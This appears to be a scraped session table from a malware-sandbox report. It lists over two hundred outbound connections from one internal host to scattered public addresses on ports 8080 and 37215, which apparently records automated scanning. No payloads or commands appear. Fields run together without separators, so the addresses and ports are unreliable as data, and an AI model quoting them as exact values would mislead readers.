                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3756192.168.2.2344982120.7.78.1428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3757192.168.2.2352318161.56.204.1888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3758192.168.2.2344698217.136.175.878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3759192.168.2.2339456126.251.69.538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3760192.168.2.2332872186.134.122.78080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3761192.168.2.234700861.227.15.2228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3762192.168.2.2345626180.148.29.438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3763192.168.2.23548209.15.251.2448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3764192.168.2.2342794120.83.98.788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3765192.168.2.2360720191.28.231.1818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3766192.168.2.2354334198.23.188.578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3767192.168.2.2342036194.210.120.1938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3768192.168.2.2340342184.13.191.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3769192.168.2.2355590162.105.207.1728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3770192.168.2.2355548181.165.76.2018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3771192.168.2.233281278.2.142.2398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3772192.168.2.235008448.51.121.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3773192.168.2.2334238123.120.145.628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3774192.168.2.235487461.154.45.538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3775192.168.2.235604017.247.209.408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3776192.168.2.234846496.16.240.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3777192.168.2.23411621.55.85.1248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3778192.168.2.234918269.4.247.748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3779192.168.2.2333906116.155.76.1438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3780192.168.2.2336512192.126.237.2328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3781192.168.2.2343546125.39.239.1928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3782192.168.2.2353942195.247.249.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3783192.168.2.233952424.227.105.1548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3784192.168.2.234837027.11.45.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3785192.168.2.2357006187.86.121.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3786192.168.2.235589652.163.176.2368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3787192.168.2.233811287.125.235.408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3788192.168.2.2355394141.159.13.1988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3789192.168.2.2353248169.110.8.2398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3790192.168.2.235784250.122.142.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3791192.168.2.235196072.132.130.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3792192.168.2.234054687.182.246.838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3793192.168.2.235518099.220.234.1968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3794192.168.2.233743065.73.207.2498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3795192.168.2.233627259.68.201.1768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3796192.168.2.2354468197.62.9.1828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3797192.168.2.233543075.43.94.1828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3798192.168.2.2359394107.14.64.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3799192.168.2.233630024.129.45.1858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3800192.168.2.2339100155.175.190.2008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3801192.168.2.2340834194.144.1.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3802192.168.2.236053297.183.40.968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3803192.168.2.2340642169.241.64.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3804192.168.2.2352296219.211.69.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3805192.168.2.2348618157.23.240.2448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3806192.168.2.235038265.68.145.338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3807192.168.2.2354262151.105.246.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3808192.168.2.234891260.79.253.1888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3809192.168.2.2354166144.60.145.848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3810192.168.2.233705261.130.134.1378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3811192.168.2.2349396162.195.74.1328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3812192.168.2.2340850162.23.19.218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3813192.168.2.2334038135.221.250.1708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3814192.168.2.233640257.166.153.2268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3815192.168.2.2342104102.6.74.1918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3816192.168.2.2345914115.29.12.178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3817192.168.2.235232677.131.56.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3818192.168.2.234999873.86.228.1598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3819192.168.2.2349948208.240.211.1458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3820192.168.2.235995249.4.198.1208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3821192.168.2.2359004223.155.147.298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3822192.168.2.2355330206.2.19.1868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3823192.168.2.235942090.170.130.2118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3824192.168.2.23328725.235.255.1308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3825192.168.2.233359079.205.225.1388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3826192.168.2.2353834193.89.81.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3827192.168.2.2343434157.248.184.48080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3828192.168.2.2352562162.57.140.2358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3829192.168.2.2351836187.227.141.19537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3830192.168.2.2351278128.234.213.3137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3831192.168.2.2357312197.11.80.12937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3832192.168.2.2334980157.57.212.4637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3833192.168.2.2344414197.84.0.10137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3834192.168.2.234723041.91.82.16337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3835192.168.2.2356530157.83.211.20837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3836192.168.2.2350212109.161.18.6837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3837192.168.2.234381241.131.100.7037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3838192.168.2.2338220197.60.6.21137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3839192.168.2.2338998157.200.92.25037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3840192.168.2.2334982197.203.235.21137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3841192.168.2.235717841.102.186.1037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3842192.168.2.2349302197.0.246.937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3843192.168.2.2358596174.152.14.22737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3844192.168.2.235442041.220.22.21137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3845192.168.2.2334336157.206.151.12537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3846192.168.2.2338220157.207.78.21137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3847192.168.2.234294241.171.123.10837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3848192.168.2.2339332197.218.165.18137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3849192.168.2.233917041.99.131.9837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3850192.168.2.234097441.118.158.8637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3851192.168.2.2349838157.227.69.25237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3852192.168.2.234626083.157.153.9237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3853192.168.2.2353974157.46.206.11037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3854192.168.2.235485639.251.24.15137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3855192.168.2.235028241.10.85.15037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3856192.168.2.235296041.39.63.7537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3857192.168.2.2359190197.20.183.9137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3858192.168.2.2350380157.46.214.25537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3859192.168.2.2351848197.158.189.6337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3860192.168.2.2336750157.139.197.2437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3861192.168.2.233703441.137.100.15637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3862192.168.2.235323841.243.120.5937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3863192.168.2.234938477.177.36.22237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3864192.168.2.2350346113.93.22.14937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3865192.168.2.235584641.106.99.337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3866192.168.2.2350926157.11.120.9037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3867192.168.2.235530041.167.131.4537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3868192.168.2.2356436157.114.100.3637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3869192.168.2.234885841.32.31.15037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3870192.168.2.233618241.252.236.1537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3871192.168.2.2357518188.219.95.7437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3872192.168.2.2352256157.52.144.20437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3873192.168.2.2336504157.130.58.20837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3874192.168.2.234351439.192.16.11237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3875192.168.2.2334286157.30.53.6937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3876192.168.2.235936841.24.209.19537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3877192.168.2.2352604157.54.52.5037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3878192.168.2.234426657.207.171.13637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3879192.168.2.2335098157.117.100.9237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3880192.168.2.2355690157.111.174.5037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3881192.168.2.2347524197.170.29.22137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3882192.168.2.2347298157.102.191.2437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3883192.168.2.2341316157.215.146.13237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3884192.168.2.233754641.13.86.7537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3885192.168.2.235759041.240.128.21637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3886192.168.2.234105495.210.170.25137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3887192.168.2.2340624157.37.188.24537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3888192.168.2.235176441.106.229.24037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3889192.168.2.2348302197.113.3.8637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3890192.168.2.234012048.240.59.3237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3891192.168.2.2359710197.201.57.13237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3892192.168.2.233810698.107.223.8137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3893192.168.2.2345414157.62.197.14437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3894192.168.2.2340482197.231.242.7937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3895192.168.2.236051041.81.172.10837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3896192.168.2.2342378157.223.158.18337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3897192.168.2.2358866197.23.164.24237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3898192.168.2.2358442134.90.73.16037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3899192.168.2.234067441.97.46.10237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3900192.168.2.235779694.15.154.15037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3901192.168.2.236050817.192.22.18737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3902192.168.2.2351924197.247.89.7437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3903192.168.2.2341536157.38.234.25237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3904192.168.2.235929241.129.13.18637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3905192.168.2.234914241.207.65.6337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3906192.168.2.233425841.190.230.11237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3907192.168.2.234951441.9.194.22737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3908192.168.2.235946238.253.63.19037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3909192.168.2.233576241.254.240.22337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3910192.168.2.2341520197.145.106.17337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3911192.168.2.233851899.124.223.5937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3912192.168.2.233476041.208.195.18737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3913192.168.2.2348170157.183.104.6237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3914192.168.2.233899241.162.30.20737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3915192.168.2.2355646197.28.103.6837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3916192.168.2.2344304197.48.136.537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3917192.168.2.2334386157.31.134.14537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3918192.168.2.2332802157.194.169.13337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3919192.168.2.233798469.177.251.16237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3920192.168.2.2355424176.175.212.20037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3921192.168.2.235170641.139.68.20237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3922192.168.2.2352016197.83.87.14037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3923192.168.2.2360582106.144.202.14037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3924192.168.2.2344534197.196.89.8637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3925192.168.2.2360404197.203.225.20437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3926192.168.2.2345050197.216.5.6837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3927192.168.2.235731071.50.212.17237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3928192.168.2.2356144157.226.174.13737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3929192.168.2.235865641.133.234.4637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3930192.168.2.2356084157.156.215.17037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3931192.168.2.235227841.248.176.7437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3932192.168.2.234004441.8.142.337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3933192.168.2.2336652197.190.192.8137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3934192.168.2.233606641.37.112.7037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3935192.168.2.235246619.11.78.11337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3936192.168.2.2336934153.33.213.13837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3937192.168.2.2338234197.22.224.16737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3938192.168.2.2338614134.218.222.23637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3939192.168.2.2347182179.8.68.337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3940192.168.2.233729441.144.175.20537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3941192.168.2.2350756197.153.3.18237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3942192.168.2.2349716157.239.47.7637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3943192.168.2.2351652197.253.219.14837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3944192.168.2.2335106153.3.201.8537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3945192.168.2.2340712197.96.12.2937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3946192.168.2.2360016157.146.218.18037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3947192.168.2.2357870197.43.93.19737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3948192.168.2.2352470157.2.239.17237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3949192.168.2.2341064157.251.65.14637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3950192.168.2.2356036197.241.36.12637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3951192.168.2.2334676222.174.213.9337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3952192.168.2.2333438197.113.228.11037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3953192.168.2.2343564120.135.171.10937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3954192.168.2.2355646197.242.87.17837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3955192.168.2.2348758213.43.247.5437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3956192.168.2.2346858197.64.192.7337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3957192.168.2.234811073.212.31.8837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3958192.168.2.2352014157.15.238.13037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3959192.168.2.2333060197.214.64.837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3960192.168.2.2337082197.214.250.17737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3961192.168.2.235523641.163.23.4437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3962192.168.2.2350786157.107.22.22237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3963192.168.2.2346546197.195.93.18537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3964192.168.2.2350570157.95.250.4937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3965192.168.2.234279235.190.174.1337215
